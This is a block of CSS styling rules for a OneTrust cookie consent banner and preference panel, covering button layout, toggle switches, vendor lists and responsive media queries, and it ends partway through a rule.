#onetrust-button-group{margin-right:0;text-align:center}#onetrust-banner-sdk .has-reject-all-button #onetrust-pc-btn-handler{float:left}#onetrust-banner-sdk .has-reject-all-button #onetrust-reject-all-handler,#onetrust-banner-sdk .has-reject-all-button #onetrust-accept-btn-handler{float:right}#onetrust-banner-sdk .has-reject-all-button #onetrust-button-group{width:calc(100% - 2em);margin-right:0}#onetrust-banner-sdk .has-reject-all-button #onetrust-pc-btn-handler.cookie-setting-link{padding-left:0px;text-align:left}#onetrust-banner-sdk.ot-buttons-fw .ot-sdk-three button{width:100%;text-align:center}#onetrust-banner-sdk.ot-buttons-fw #onetrust-button-group-parent button{float:none}#onetrust-banner-sdk.ot-buttons-fw #onetrust-pc-btn-handler.cookie-setting-link{text-align:center}}@media only screen and (min-width: 550px){#onetrust-banner-sdk .banner-option:not(:first-child){border-left:1px solid #d8d8d8;padding-left:25px}}@media only screen and (min-width: 425px)and (max-width: 550px){#onetrust-banner-sdk.ot-iab-2 #onetrust-button-group,#onetrust-banner-sdk.ot-iab-2 #onetrust-policy,#onetrust-banner-sdk.ot-iab-2 .banner-option{width:100%}#onetrust-banner-sdk.ot-iab-2 #onetrust-button-group #onetrust-accept-btn-handler,#onetrust-banner-sdk.ot-iab-2 #onetrust-button-group #onetrust-reject-all-handler,#onetrust-banner-sdk.ot-iab-2 #onetrust-button-group #onetrust-pc-btn-handler{width:100%}#onetrust-banner-sdk.ot-iab-2 #onetrust-button-group #onetrust-accept-btn-handler,#onetrust-banner-sdk.ot-iab-2 #onetrust-button-group #onetrust-reject-all-handler{float:left}}@media only screen and (min-width: 769px){#onetrust-banner-sdk #onetrust-button-group{margin-right:30%}#onetrust-banner-sdk #banner-options{margin-left:2em;margin-right:5em;margin-bottom:1.25em;width:calc(100% - 7em)}}@media only screen and (min-width: 897px)and (max-width: 1023px){#onetrust-banner-sdk.vertical-align-content #onetrust-button-group-parent{position:absolute;top:50%;left:75%;transform:translateY(-50%)}#onetrust-banner-sdk #onetrust-close-btn-container{top:50%;margin:auto;transform:translate(-50%, -50%);position:absolute;padding:0;right:0}#onetrust-banner-sdk #onetrust-close-btn-container button{position:relative;margin:0;right:-22px;top:2px}}@media only screen and (min-width: 1024px){#onetrust-banner-sdk #onetrust-close-btn-container{top:50%;margin:auto;transform:translate(-50%, -50%);position:absolute;right:0}#onetrust-banner-sdk #onetrust-close-btn-container button{right:-12px}#onetrust-banner-sdk #onetrust-policy{margin-left:2em}#onetrust-banner-sdk.vertical-align-content #onetrust-button-group-parent{position:absolute;top:50%;left:60%;transform:translateY(-50%)}#onetrust-banner-sdk .ot-optout-signal{width:50%}#onetrust-banner-sdk.ot-iab-2 #onetrust-policy-title{width:50%}#onetrust-banner-sdk.ot-iab-2 #onetrust-policy-text,#onetrust-banner-sdk.ot-iab-2 :not(.ot-dpd-desc)>.ot-b-addl-desc{margin-bottom:1em;width:50%;border-right:1px solid #d8d8d8;padding-right:1rem}#onetrust-banner-sdk.ot-iab-2 #onetrust-policy-text{margin-bottom:0;padding-bottom:1em}#onetrust-banner-sdk.ot-iab-2 :not(.ot-dpd-desc)>.ot-b-addl-desc{margin-bottom:0;padding-bottom:1em}#onetrust-banner-sdk.ot-iab-2 .ot-dpd-container{width:45%;padding-left:1rem;display:inline-block;float:none}#onetrust-banner-sdk.ot-iab-2 .ot-dpd-title{line-height:1.7}#onetrust-banner-sdk.ot-iab-2 #onetrust-button-group-parent{left:auto;right:4%;margin-left:0}#onetrust-banner-sdk.ot-iab-2 #onetrust-button-group button{display:block}#onetrust-banner-sdk:not(.ot-iab-2) #onetrust-button-group-parent{margin:auto;width:30%}#onetrust-banner-sdk:not(.ot-iab-2) #onetrust-group-container{width:60%}#onetrust-banner-sdk #onetrust-button-group{margin-right:auto}#onetrust-banner-sdk #onetrust-accept-btn-handler,#onetrust-banner-sdk #onetrust-reject-all-handler,#onetrust-banner-sdk #onetrust-pc-btn-handler{margin-top:1em}}@media only screen and (min-width: 890px){#onetrust-banner-sdk.ot-buttons-fw:not(.ot-iab-2) #onetrust-button-group-parent{padding-left:3%;padding-right:4%;margin-left:0}#onetrust-banner-sdk.ot-buttons-fw:not(.ot-iab-2) #onetrust-button-group{margin-right:0;margin-top:1.25em;width:100%}#onetrust-banner-sdk.ot-buttons-fw:not(.ot-iab-2) #onetrust-button-group button{width:100%;margin-bottom:5px;margin-top:5px}#onetrust-banner-sdk.ot-buttons-fw:not(.ot-iab-2) #onetrust-button-group button:last-of-type{margin-bottom:20px}}@media only screen and (min-width: 1280px){#onetrust-banner-sdk:not(.ot-iab-2) #onetrust-group-container{width:55%}#onetrust-banner-sdk:not(.ot-iab-2) #onetrust-button-group-parent{width:44%;padding-left:2%;padding-right:2%}#onetrust-banner-sdk:not(.ot-iab-2).vertical-align-content #onetrust-button-group-parent{position:absolute;left:55%}}
        #onetrust-consent-sdk #onetrust-banner-sdk {background-color: #000000;}
            #onetrust-consent-sdk #onetrust-policy-title,
                    #onetrust-consent-sdk #onetrust-policy-text,
                    #onetrust-consent-sdk .ot-b-addl-desc,
                    #onetrust-consent-sdk .ot-dpd-desc,
                    #onetrust-consent-sdk .ot-dpd-title,
                    #onetrust-consent-sdk #onetrust-policy-text *:not(.onetrust-vendors-list-handler),
                    #onetrust-consent-sdk .ot-dpd-desc *:not(.onetrust-vendors-list-handler),
                    #onetrust-consent-sdk #onetrust-banner-sdk #banner-options *,
                    #onetrust-banner-sdk .ot-cat-header,
                    #onetrust-banner-sdk .ot-optout-signal
                    {
                        color: #FFFFFF;
                    }
            #onetrust-consent-sdk #onetrust-banner-sdk .banner-option-details {
                    background-color: #E9E9E9;}
             #onetrust-consent-sdk #onetrust-banner-sdk a[href],
                    #onetrust-consent-sdk #onetrust-banner-sdk a[href] font,
                    #onetrust-consent-sdk #onetrust-banner-sdk .ot-link-btn
                        {
                            color: #00C0E8;
                        }#onetrust-consent-sdk #onetrust-accept-btn-handler,
                         #onetrust-banner-sdk #onetrust-reject-all-handler {
                            background-color: #00CC66;border-color: #00CC66;
                color: #000000;
            }
            #onetrust-consent-sdk #onetrust-banner-sdk *:focus,
            #onetrust-consent-sdk #onetrust-banner-sdk:focus {
               outline-color: #000000;
               outline-width: 1px;
            }
            #onetrust-consent-sdk #onetrust-pc-btn-handler,
            #onetrust-consent-sdk #onetrust-pc-btn-handler.cookie-setting-link {
                color: #000000; border-color: #000000;
                background-color:
                #FFFFFF;
            }#onetrust-pc-sdk .ot-cat-grp .ot-always-active {
    color: #09e66e;
}
div.ot-optout-signal > span{
color: #000000 !important;
}

@media only screen and (min-width: 426px) and (max-width: 767px){
    #onetrust-banner-sdk #onetrust-button-group-parent {
        margin: 1rem;
    }
}
@media only screen and (max-width: 767px) {
    #onetrust-button-group{
        display: flex !important;
        flex-direction: column-reverse !important;
    }
}
@media only screen and (min-width: 890px) and (max-width: 1279px){
    #onetrust-button-group{
        display: flex !important;
        flex-direction: column-reverse !important;
    }
    #onetrust-banner-sdk.ot-buttons-fw:not(.ot-iab-2) #onetrust-button-group button:last-of-type{
        margin-bottom: 5px !important;
    }
    #onetrust-banner-sdk .ot-sdk-three.ot-sdk-columns, #onetrust-pc-sdk .ot-sdk-three.ot-sdk-columns, #ot-sdk-cookie-policy .ot-sdk-three.ot-sdk-columns{
        width: 26%;
        margin-bottom: 1.2rem;
        margin-top: 1rem;
    }
    #onetrust-banner-sdk.vertical-align-content #onetrust-button-group-parent {
        position: relative  !important;
        top: unset !important;
        left: unset !important;
        transform: translateY(0)  !important;
    }
   
}

@media only screen and (min-width: 1024px){
    #onetrust-banner-sdk:not(.ot-iab-2) #onetrust-button-group-parent {
        width: 34% !important;
        position: relative !important;
        top: unset !important;
        left: unset !important;
        transform: translateY(0) !important;
    }
   
}
@media only screen and (min-width: 1280px) {
    #onetrust-button-group{
        display: flex !important;
        flex-direction: row-reverse !important;
    }
    #onetrust-banner-sdk:not(.ot-iab-2) #onetrust-button-group-parent {
        width: 44% !important;
    }
}#onetrust-pc-sdk.otPcCenter{overflow:hidden;position:fixed;margin:0 auto;top:5%;right:0;left:0;width:40%;max-width:575px;min-width:575px;border-radius:2.5px;z-index:2147483647;background-color:#fff;-webkit-box-shadow:0px 2px 10px -3px #999;-moz-box-shadow:0px 2px 10px -3px #999;box-shadow:0px 2px 10px -3px #999}#onetrust-pc-sdk.otPcCenter[dir=rtl]{right:0;left:0}#onetrust-pc-sdk.otRelFont{font-size:1rem}#onetrust-pc-sdk .ot-optout-signal{margin-top:.625rem}#onetrust-pc-sdk #ot-addtl-venlst .ot-arw-cntr,#onetrust-pc-sdk #ot-addtl-venlst .ot-plus-minus,#onetrust-pc-sdk .ot-hide-tgl{visibility:hidden}#onetrust-pc-sdk #ot-addtl-venlst .ot-arw-cntr *,#onetrust-pc-sdk #ot-addtl-venlst .ot-plus-minus *,#onetrust-pc-sdk .ot-hide-tgl *{visibility:hidden}#onetrust-pc-sdk #ot-gn-venlst .ot-ven-item .ot-acc-hdr{min-height:40px}#onetrust-pc-sdk .ot-pc-header{height:39px;padding:10px 0 10px 30px;border-bottom:1px solid #e9e9e9}#onetrust-pc-sdk #ot-pc-title,#onetrust-pc-sdk #ot-category-title,#onetrust-pc-sdk .ot-cat-header,#onetrust-pc-sdk #ot-lst-title,#onetrust-pc-sdk .ot-ven-hdr .ot-ven-name,#onetrust-pc-sdk .ot-always-active{font-weight:bold;color:dimgray}#onetrust-pc-sdk .ot-always-active-group .ot-cat-header{width:55%;font-weight:700}#onetrust-pc-sdk .ot-cat-item p{clear:both;float:left;margin-top:10px;margin-bottom:5px;line-height:1.5;font-size:.812em;color:dimgray}#onetrust-pc-sdk .ot-close-icon{height:44px;width:44px;background-size:10px}#onetrust-pc-sdk #ot-pc-title{float:left;font-size:1em;line-height:1.5;margin-bottom:10px;margin-top:10px;width:100%}#onetrust-pc-sdk #accept-recommended-btn-handler{margin-right:10px;margin-bottom:25px;outline-offset:-1px}#onetrust-pc-sdk #ot-pc-desc{clear:both;width:100%;font-size:.812em;line-height:1.5;margin-bottom:25px}#onetrust-pc-sdk #ot-pc-desc a{margin-left:5px}#onetrust-pc-sdk #ot-pc-desc *{font-size:inherit;line-height:inherit}#onetrust-pc-sdk #ot-pc-desc ul li{padding:10px 0px}#onetrust-pc-sdk a{color:#656565;cursor:pointer}#onetrust-pc-sdk a:hover{color:#3860be}#onetrust-pc-sdk label{margin-bottom:0}#onetrust-pc-sdk #vdr-lst-dsc{font-size:.812em;line-height:1.5;padding:10px 15px 5px 15px}#onetrust-pc-sdk button{max-width:394px;padding:12px 30px;line-height:1;word-break:break-word;word-wrap:break-word;white-space:normal;font-weight:bold;height:auto}#onetrust-pc-sdk .ot-link-btn{padding:0;margin-bottom:0;border:0;font-weight:normal;line-height:normal;width:auto;height:auto}#onetrust-pc-sdk #ot-pc-content{position:absolute;overflow-y:scroll;padding-left:0px;padding-right:30px;top:60px;bottom:110px;margin:1px 3px 0 30px;width:calc(100% - 63px)}#onetrust-pc-sdk .ot-vs-list .ot-always-active,#onetrust-pc-sdk .ot-cat-grp .ot-always-active{float:right;clear:none;color:#3860be;margin:0;font-size:.813em;line-height:1.3}#onetrust-pc-sdk .ot-pc-scrollbar::-webkit-scrollbar-track{margin-right:20px}#onetrust-pc-sdk .ot-pc-scrollbar::-webkit-scrollbar{width:11px}#onetrust-pc-sdk .ot-pc-scrollbar::-webkit-scrollbar-thumb{border-radius:10px;background:#d8d8d8}#onetrust-pc-sdk input[type=checkbox]:focus+.ot-acc-hdr{outline:#000 1px solid}#onetrust-pc-sdk .ot-pc-scrollbar{scrollbar-arrow-color:#d8d8d8;scrollbar-darkshadow-color:#d8d8d8;scrollbar-face-color:#d8d8d8;scrollbar-shadow-color:#d8d8d8}#onetrust-pc-sdk .save-preference-btn-handler{margin-right:20px}#onetrust-pc-sdk .ot-pc-refuse-all-handler{margin-right:10px}#onetrust-pc-sdk #ot-pc-desc .privacy-notice-link{margin-left:0;margin-right:8px}#onetrust-pc-sdk #ot-pc-desc .ot-imprint-handler{margin-left:0;margin-right:8px}#onetrust-pc-sdk .ot-subgrp-cntr{display:inline-block;clear:both;width:100%;padding-top:15px}#onetrust-pc-sdk .ot-switch+.ot-subgrp-cntr{padding-top:10px}#onetrust-pc-sdk ul.ot-subgrps{margin:0;font-size:initial}#onetrust-pc-sdk ul.ot-subgrps li p,#onetrust-pc-sdk ul.ot-subgrps li h5{font-size:.813em;line-height:1.4;color:dimgray}#onetrust-pc-sdk ul.ot-subgrps .ot-switch{min-height:auto}#onetrust-pc-sdk ul.ot-subgrps .ot-switch-nob{top:0}#onetrust-pc-sdk ul.ot-subgrps .ot-acc-hdr{display:inline-block;width:100%}#onetrust-pc-sdk ul.ot-subgrps .ot-acc-txt{margin:0}#onetrust-pc-sdk ul.ot-subgrps li{padding:0;border:none}#onetrust-pc-sdk ul.ot-subgrps li h5{position:relative;top:5px;font-weight:bold;margin-bottom:0;float:left}#onetrust-pc-sdk li.ot-subgrp{margin-left:20px;overflow:auto}#onetrust-pc-sdk li.ot-subgrp>h5{width:calc(100% - 100px)}#onetrust-pc-sdk .ot-cat-item p>ul,#onetrust-pc-sdk li.ot-subgrp p>ul{margin:0px;list-style:disc;margin-left:15px;font-size:inherit}#onetrust-pc-sdk .ot-cat-item p>ul li,#onetrust-pc-sdk li.ot-subgrp p>ul li{font-size:inherit;padding-top:10px;padding-left:0px;padding-right:0px;border:none}#onetrust-pc-sdk .ot-cat-item p>ul li:last-child,#onetrust-pc-sdk li.ot-subgrp p>ul li:last-child{padding-bottom:10px}#onetrust-pc-sdk .ot-pc-logo{height:40px;width:120px}#onetrust-pc-sdk .ot-pc-footer{position:absolute;bottom:0px;width:100%;max-height:160px;border-top:1px solid #d8d8d8}#onetrust-pc-sdk.ot-ftr-stacked .ot-pc-refuse-all-handler{margin-bottom:0px}#onetrust-pc-sdk.ot-ftr-stacked #ot-pc-content{bottom:160px}#onetrust-pc-sdk.ot-ftr-stacked .ot-pc-footer button{width:100%;max-width:none}#onetrust-pc-sdk.ot-ftr-stacked .ot-btn-container{margin:0 30px;width:calc(100% - 60px);padding-right:0}#onetrust-pc-sdk .ot-pc-footer-logo{height:30px;width:100%;text-align:right;background:#f4f4f4}#onetrust-pc-sdk .ot-pc-footer-logo a{display:inline-block;margin-top:5px;margin-right:10px}#onetrust-pc-sdk[dir=rtl] .ot-pc-footer-logo{direction:rtl}#onetrust-pc-sdk[dir=rtl] .ot-pc-footer-logo a{margin-right:25px}#onetrust-pc-sdk .ot-tgl{float:right;position:relative;z-index:1}#onetrust-pc-sdk .ot-tgl input:checked+.ot-switch .ot-switch-nob{background-color:#468254;border:1px solid #fff}#onetrust-pc-sdk .ot-tgl input:checked+.ot-switch .ot-switch-nob:before{-webkit-transform:translateX(20px);-ms-transform:translateX(20px);transform:translateX(20px);background-color:#fff;border-color:#fff}#onetrust-pc-sdk .ot-tgl input:focus+.ot-switch{outline:#000 solid 1px}#onetrust-pc-sdk .ot-switch{position:relative;display:inline-block;width:45px;height:25px}#onetrust-pc-sdk .ot-switch-nob{position:absolute;cursor:pointer;top:0;left:0;right:0;bottom:0;background-color:#767676;border:1px solid #ddd;transition:all .2s ease-in 0s;-moz-transition:all .2s ease-in 0s;-o-transition:all .2s ease-in 0s;-webkit-transition:all .2s ease-in 0s;border-radius:20px}#onetrust-pc-sdk .ot-switch-nob:before{position:absolute;content:"";height:18px;width:18px;bottom:3px;left:3px;background-color:#fff;-webkit-transition:.4s;transition:.4s;border-radius:20px}#onetrust-pc-sdk .ot-chkbox input:checked~label::before{background-color:#3860be}#onetrust-pc-sdk .ot-chkbox input+label::after{content:none;color:#fff}#onetrust-pc-sdk .ot-chkbox input:checked+label::after{content:""}#onetrust-pc-sdk .ot-chkbox input:focus+label::before{outline-style:solid;outline-width:2px;outline-style:auto}#onetrust-pc-sdk .ot-chkbox label{position:relative;display:inline-block;padding-left:30px;cursor:pointer;font-weight:500}#onetrust-pc-sdk .ot-chkbox label::before,#onetrust-pc-sdk .ot-chkbox label::after{position:absolute;content:"";display:inline-block;border-radius:3px}#onetrust-pc-sdk .ot-chkbox label::before{height:18px;width:18px;border:1px solid #3860be;left:0px;top:auto}#onetrust-pc-sdk .ot-chkbox label::after{height:5px;width:9px;border-left:3px solid;border-bottom:3px solid;transform:rotate(-45deg);-o-transform:rotate(-45deg);-ms-transform:rotate(-45deg);-webkit-transform:rotate(-45deg);left:4px;top:5px}#onetrust-pc-sdk .ot-label-txt{display:none}#onetrust-pc-sdk .ot-chkbox input,#onetrust-pc-sdk .ot-tgl input{position:absolute;opacity:0;width:0;height:0}#onetrust-pc-sdk .ot-arw-cntr{float:right;position:relative;pointer-events:none}#onetrust-pc-sdk .ot-arw-cntr .ot-arw{width:16px;height:16px;margin-left:5px;color:dimgray;display:inline-block;vertical-align:middle;-webkit-transition:all 150ms ease-in 0s;-moz-transition:all 150ms ease-in 0s;-o-transition:all 150ms ease-in 0s;transition:all 150ms ease-in 0s}#onetrust-pc-sdk input:checked~.ot-acc-hdr .ot-arw,#onetrust-pc-sdk button[aria-expanded=true]~.ot-acc-hdr .ot-arw-cntr svg{transform:rotate(90deg);-o-transform:rotate(90deg);-ms-transform:rotate(90deg);-webkit-transform:rotate(90deg)}#onetrust-pc-sdk input[type=checkbox]:focus+.ot-acc-hdr{outline:#000 1px solid}#onetrust-pc-sdk .ot-tgl-cntr,#onetrust-pc-sdk .ot-arw-cntr{display:inline-block}#onetrust-pc-sdk .ot-tgl-cntr{width:45px;float:right;margin-top:2px}#onetrust-pc-sdk #ot-lst-cnt .ot-tgl-cntr{margin-top:10px}#onetrust-pc-sdk .ot-always-active-subgroup{width:auto;padding-left:0px !important;top:3px;position:relative}#onetrust-pc-sdk .ot-label-status{padding-left:5px;font-size:.75em;display:none}#onetrust-pc-sdk .ot-arw-cntr{margin-top:-1px}#onetrust-pc-sdk .ot-arw-cntr svg{-webkit-transition:all 300ms ease-in 0s;-moz-transition:all 300ms ease-in 0s;-o-transition:all 300ms ease-in 0s;transition:all 300ms ease-in 0s;height:10px;width:10px}#onetrust-pc-sdk input:checked~.ot-acc-hdr .ot-arw{transform:rotate(90deg);-o-transform:rotate(90deg);-ms-transform:rotate(90deg);-webkit-transform:rotate(90deg)}#onetrust-pc-sdk .ot-arw{width:10px;margin-left:15px;transition:all 300ms ease-in 0s;-webkit-transition:all 300ms ease-in 0s;-moz-transition:all 300ms ease-in 0s;-o-transition:all 300ms ease-in 0s}#onetrust-pc-sdk .ot-vlst-cntr{margin-bottom:0}#onetrust-pc-sdk .ot-hlst-cntr{margin-top:5px;display:inline-block;width:100%}#onetrust-pc-sdk .category-vendors-list-handler,#onetrust-pc-sdk .category-vendors-list-handler+a,#onetrust-pc-sdk .category-host-list-handler{clear:both;color:#3860be;margin-left:0;font-size:.813em;text-decoration:none;float:left;overflow:hidden}#onetrust-pc-sdk .category-vendors-list-handler:hover,#onetrust-pc-sdk .category-vendors-list-handler+a:hover,#onetrust-pc-sdk .category-host-list-handler:hover{text-decoration-line:underline}#onetrust-pc-sdk .category-vendors-list-handler+a{clear:none}#onetrust-pc-sdk .ot-vlst-cntr .ot-ext-lnk,#onetrust-pc-sdk .ot-ven-hdr .ot-ext-lnk{display:inline-block;height:13px;width:13px;background-repeat:no-repeat;margin-left:1px;margin-top:6px;cursor:pointer}#onetrust-pc-sdk .ot-ven-hdr .ot-ext-lnk{margin-bottom:-1px}#onetrust-pc-sdk .back-btn-handler{font-size:1em;text-decoration:none}#onetrust-pc-sdk .back-btn-handler:hover{opacity:.6}#onetrust-pc-sdk #ot-lst-title h3{display:inline-block;word-break:break-word;word-wrap:break-word;margin-bottom:0;color:#656565;font-size:1em;font-weight:bold;margin-left:15px}#onetrust-pc-sdk #ot-lst-title{margin:10px 0 10px 0px;font-size:1em;text-align:left}#onetrust-pc-sdk #ot-pc-hdr{margin:0 0 0 30px;height:auto;width:auto}#onetrust-pc-sdk #ot-pc-hdr input::placeholder{color:#d4d4d4;font-style:italic}#onetrust-pc-sdk #vendor-search-handler{height:31px;width:100%;border-radius:50px;font-size:.8em;padding-right:35px;padding-left:15px;float:left;margin-left:15px}#onetrust-pc-sdk .ot-ven-name{display:block;width:auto;padding-right:5px}#onetrust-pc-sdk #ot-lst-cnt{overflow-y:auto;margin-left:20px;margin-right:7px;width:calc(100% - 27px);max-height:calc(100% - 80px);height:100%;transform:translate3d(0, 0, 0)}#onetrust-pc-sdk #ot-pc-lst{width:100%;bottom:100px;position:absolute;top:60px}#onetrust-pc-sdk #ot-pc-lst:not(.ot-enbl-chr) .ot-tgl-cntr .ot-arw-cntr,#onetrust-pc-sdk #ot-pc-lst:not(.ot-enbl-chr) .ot-tgl-cntr .ot-arw-cntr *{visibility:hidden}#onetrust-pc-sdk #ot-pc-lst .ot-tgl-cntr{right:12px;position:absolute}#onetrust-pc-sdk #ot-pc-lst .ot-arw-cntr{float:right;position:relative}#onetrust-pc-sdk #ot-pc-lst .ot-arw{margin-left:10px}#onetrust-pc-sdk #ot-pc-lst .ot-acc-hdr{overflow:hidden;cursor:pointer}#onetrust-pc-sdk .ot-vlst-cntr{overflow:hidden}#onetrust-pc-sdk #ot-sel-blk{overflow:hidden;width:100%;position:sticky;position:-webkit-sticky;top:0;z-index:3}#onetrust-pc-sdk #ot-back-arw{height:12px;width:12px}#onetrust-pc-sdk .ot-lst-subhdr{width:100%;display:inline-block}#onetrust-pc-sdk .ot-search-cntr{float:left;width:78%;position:relative}#onetrust-pc-sdk .ot-search-cntr>svg{width:30px;height:30px;position:absolute;float:left;right:-15px}#onetrust-pc-sdk .ot-fltr-cntr{float:right;right:50px;position:relative}#onetrust-pc-sdk #filter-btn-handler{background-color:#3860be;border-radius:17px;display:inline-block;position:relative;width:32px;height:32px;-moz-transition:.1s ease;-o-transition:.1s ease;-webkit-transition:1s ease;transition:.1s ease;padding:0;margin:0}#onetrust-pc-sdk #filter-btn-handler:hover{background-color:#3860be}#onetrust-pc-sdk #filter-btn-handler svg{width:12px;height:12px;margin:3px 10px 0 10px;display:block;position:static;right:auto;top:auto}#onetrust-pc-sdk .ot-ven-link,#onetrust-pc-sdk .ot-ven-legclaim-link{color:#3860be;text-decoration:none;font-weight:100;display:inline-block;padding-top:10px;transform:translate(0, 1%);-o-transform:translate(0, 1%);-ms-transform:translate(0, 1%);-webkit-transform:translate(0, 1%);position:relative;z-index:2}#onetrust-pc-sdk .ot-ven-link *,#onetrust-pc-sdk .ot-ven-legclaim-link *{font-size:inherit}#onetrust-pc-sdk .ot-ven-link:hover,#onetrust-pc-sdk .ot-ven-legclaim-link:hover{text-decoration:underline}#onetrust-pc-sdk .ot-ven-hdr{width:calc(100% - 160px);height:auto;float:left;word-break:break-word;word-wrap:break-word;vertical-align:middle;padding-bottom:3px}#onetrust-pc-sdk .ot-ven-link,#onetrust-pc-sdk .ot-ven-legclaim-link{letter-spacing:.03em;font-size:.75em;font-weight:400}#onetrust-pc-sdk .ot-ven-dets{border-radius:2px;background-color:#f8f8f8}#onetrust-pc-sdk .ot-ven-dets li:first-child p:first-child{border-top:none}#onetrust-pc-sdk .ot-ven-dets .ot-ven-disc:not(:first-child){border-top:1px solid #ddd !important}#onetrust-pc-sdk .ot-ven-dets .ot-ven-disc:nth-child(n+3) p{display:inline-block}#onetrust-pc-sdk .ot-ven-dets .ot-ven-disc:nth-child(n+3) p:nth-of-type(odd){width:30%}#onetrust-pc-sdk .ot-ven-dets .ot-ven-disc:nth-child(n+3) p:nth-of-type(even){width:50%;word-break:break-word;word-wrap:break-word}#onetrust-pc-sdk .ot-ven-dets .ot-ven-disc p,#onetrust-pc-sdk .ot-ven-dets .ot-ven-disc h5{padding-top:5px;padding-bottom:5px;display:block}#onetrust-pc-sdk .ot-ven-dets .ot-ven-disc h5{display:inline-block}#onetrust-pc-sdk .ot-ven-dets .ot-ven-disc p:nth-last-child(-n+1){padding-bottom:10px}#onetrust-pc-sdk .ot-ven-dets .ot-ven-disc p:nth-child(-n+2):not(.disc-pur){padding-top:10px}#onetrust-pc-sdk .ot-ven-dets .ot-ven-disc .disc-pur-cont{display:inline}#onetrust-pc-sdk .ot-ven-dets .ot-ven-disc .disc-pur{position:relative;width:50% !important;word-break:break-word;word-wrap:break-word;left:calc(30% + 17px)}#onetrust-pc-sdk .ot-ven-dets .ot-ven-disc .disc-pur:nth-child(-n+1){position:static}#onetrust-pc-sdk .ot-ven-dets p,#onetrust-pc-sdk .ot-ven-dets h5,#onetrust-pc-sdk .ot-ven-dets span{font-size:.69em;text-align:left;vertical-align:middle;word-break:break-word;word-wrap:break-word;margin:0;padding-bottom:10px;padding-left:15px;color:#2e3644}#onetrust-pc-sdk .ot-ven-dets h5{padding-top:5px}#onetrust-pc-sdk .ot-ven-dets span{color:dimgray;padding:0;vertical-align:baseline}#onetrust-pc-sdk .ot-ven-dets .ot-ven-pur h5{border-top:1px solid #e9e9e9;border-bottom:1px solid #e9e9e9;padding-bottom:5px;margin-bottom:5px;font-weight:bold}#onetrust-pc-sdk #ot-host-lst .ot-sel-all{float:right;position:relative;margin-right:42px;top:10px}#onetrust-pc-sdk #ot-host-lst .ot-sel-all input[type=checkbox]{width:auto;height:auto}#onetrust-pc-sdk #ot-host-lst .ot-sel-all label{height:20px;width:20px;padding-left:0px}#onetrust-pc-sdk #ot-host-lst .ot-acc-txt{overflow:hidden;width:95%}#onetrust-pc-sdk .ot-host-hdr{position:relative;z-index:1;pointer-events:none;width:calc(100% - 125px);float:left}#onetrust-pc-sdk .ot-host-name,#onetrust-pc-sdk .ot-host-desc{display:inline-block;width:90%}#onetrust-pc-sdk .ot-host-name{pointer-events:none}#onetrust-pc-sdk .ot-host-hdr>a{text-decoration:underline;font-size:.82em;position:relative;z-index:2;float:left;margin-bottom:5px;pointer-events:initial}#onetrust-pc-sdk .ot-host-name+a{margin-top:5px}#onetrust-pc-sdk .ot-host-name,#onetrust-pc-sdk .ot-host-name a,#onetrust-pc-sdk .ot-host-desc,#onetrust-pc-sdk .ot-host-info{color:dimgray;word-break:break-word;word-wrap:break-word}#onetrust-pc-sdk .ot-host-name,#onetrust-pc-sdk .ot-host-name a{font-weight:bold;font-size:.82em;line-height:1.3}#onetrust-pc-sdk .ot-host-name a{font-size:1em}#onetrust-pc-sdk .ot-host-expand{margin-top:3px;margin-bottom:3px;clear:both;display:block;color:#3860be;font-size:.72em;font-weight:normal}#onetrust-pc-sdk .ot-host-expand *{font-size:inherit}#onetrust-pc-sdk .ot-host-desc,#onetrust-pc-sdk .ot-host-info{font-size:.688em;line-height:1.4;font-weight:normal}#onetrust-pc-sdk .ot-host-desc{margin-top:10px}#onetrust-pc-sdk .ot-host-opt{margin:0;font-size:inherit;display:inline-block;width:100%}#onetrust-pc-sdk .ot-host-opt li>div div{font-size:.8em;padding:5px 0}#onetrust-pc-sdk .ot-host-opt li>div div:nth-child(1){width:30%;float:left}#onetrust-pc-sdk .ot-host-opt li>div div:nth-child(2){width:70%;float:left;word-break:break-word;word-wrap:break-word}#onetrust-pc-sdk .ot-host-info{border:none;display:inline-block;width:calc(100% - 10px);padding:10px;margin-bottom:10px;background-color:#f8f8f8}#onetrust-pc-sdk .ot-host-info>div{overflow:auto}#onetrust-pc-sdk #no-results{text-align:center;margin-top:30px}#onetrust-pc-sdk #no-results p{font-size:1em;color:#2e3644;word-break:break-word;word-wrap:break-word}#onetrust-pc-sdk #no-results p span{font-weight:bold}#onetrust-pc-sdk #ot-fltr-modal{width:100%;height:auto;display:none;-moz-transition:.2s ease;-o-transition:.2s ease;-webkit-transition:2s ease;transition:.2s ease;overflow:hidden;opacity:1;right:0}#onetrust-pc-sdk #ot-fltr-modal .ot-label-txt{display:inline-block;font-size:.85em;color:dimgray}#onetrust-pc-sdk #ot-fltr-cnt{z-index:2147483646;background-color:#fff;position:absolute;height:90%;max-height:300px;width:325px;left:210px;margin-top:10px;margin-bottom:20px;padding-right:10px;border-radius:3px;-webkit-box-shadow:0px 0px 12px 2px #c7c5c7;-moz-box-shadow:0px 0px 12px 2px #c7c5c7;box-shadow:0px 0px 12px 2px #c7c5c7}#onetrust-pc-sdk .ot-fltr-scrlcnt{overflow-y:auto;overflow-x:hidden;clear:both;max-height:calc(100% - 60px)}#onetrust-pc-sdk #ot-anchor{border:12px solid rgba(0,0,0,0);display:none;position:absolute;z-index:2147483647;right:55px;top:75px;transform:rotate(45deg);-o-transform:rotate(45deg);-ms-transform:rotate(45deg);-webkit-transform:rotate(45deg);background-color:#fff;-webkit-box-shadow:-3px -3px 5px -2px #c7c5c7;-moz-box-shadow:-3px -3px 5px -2px #c7c5c7;box-shadow:-3px -3px 5px -2px #c7c5c7}#onetrust-pc-sdk .ot-fltr-btns{margin-left:15px}#onetrust-pc-sdk #filter-apply-handler{margin-right:15px}#onetrust-pc-sdk .ot-fltr-opt{margin-bottom:25px;margin-left:15px;width:75%;position:relative}#onetrust-pc-sdk .ot-fltr-opt p{display:inline-block;margin:0;font-size:.9em;color:#2e3644}#onetrust-pc-sdk .ot-chkbox label span{font-size:.85em;color:dimgray}#onetrust-pc-sdk .ot-chkbox input[type=checkbox]+label::after{content:none;color:#fff}#onetrust-pc-sdk .ot-chkbox input[type=checkbox]:checked+label::after{content:""}#onetrust-pc-sdk .ot-chkbox input[type=checkbox]:focus+label::before{outline-style:solid;outline-width:2px;outline-style:auto}#onetrust-pc-sdk #ot-selall-vencntr,#onetrust-pc-sdk #ot-selall-adtlvencntr,#onetrust-pc-sdk #ot-selall-hostcntr,#onetrust-pc-sdk #ot-selall-licntr,#onetrust-pc-sdk #ot-selall-gnvencntr{right:15px;position:relative;width:20px;height:20px;float:right}#onetrust-pc-sdk #ot-selall-vencntr 